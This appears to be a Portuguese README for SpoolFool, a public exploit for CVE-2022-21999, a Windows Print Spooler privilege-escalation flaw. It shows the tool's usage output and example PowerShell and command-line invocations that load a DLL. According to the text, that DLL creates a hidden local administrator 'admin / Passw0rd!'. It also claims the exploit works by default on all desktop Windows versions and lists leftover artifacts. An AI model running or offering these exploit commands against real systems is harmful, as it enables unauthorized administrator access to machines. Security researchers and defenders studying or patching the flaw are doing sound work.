
Exploit para CVE-2022-21999 - Vulnerabilidade de Elevação de Privilégio do Windows Print Spooler (LPE)
Exploit para CVE-2022-21999 - Vulnerabilidade de Elevação de Privilégio do Windows Print Spooler (LPE)
O exploit fornecido deve funcionar por padrão em todas as versões desktop do Windows.
Consulte a publicação do blog para obter detalhes técnicos completos aqui.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
A PoC a seguir usa uma DLL que cria um novo administrador local admin / Passw0rd!. A DLL (AddUser.dll) e o código-fonte podem ser encontrados neste repositório.

Segunda execução
A PoC a seguir demonstra uma segunda execução do exploit fornecido. Observe que a vulnerabilidade não é explorada desta vez para carregar a DLL.

Após a execução do exploit, os seguintes artefatos serão deixados para limpeza posterior:
SpoolDirectory da impressora alvo não é restaurado